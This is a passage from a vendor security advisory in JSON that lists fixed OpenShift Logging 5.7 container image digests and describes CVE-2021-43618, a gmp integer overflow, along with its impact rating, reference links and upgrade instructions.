"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: ext4: kernel bug in ext4_write_inline_data_end()"
},
{
"cve": "CVE-2021-43618",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2021-11-15T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2024904"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in gmp. An integer overflow vulnerability could allow an attacker to input an integer value leading to a crash. The highest threat from this vulnerability is to system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "gmp: Integer overflow and resultant buffer overflow via crafted input",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation is only possible on 32-bit systems. The susceptible GMP package is not tethered to the network stack, so it can only be exploited via a file already on the local system. This can be achieved either by the attacker gaining local login credentials or alternatively; by tricking a user into loading then executing a malicious file. Because of these combined reasons Red Hat Product Security rates the impact as Moderate.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-43618"
},
{
"category": "external",
"summary": "RHBZ#2024904",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024904"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-43618",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43618"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618"
},
{
"category": "external",
"summary": "https://bugs.debian.org/994405",
"url": "https://bugs.debian.org/994405"
},
{
"category": "external",
"summary": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html",
"url": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html"
},
{
"category": "external",
"summary": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e",
"url": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e"
}
],
"release_date": "2021-11-15T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
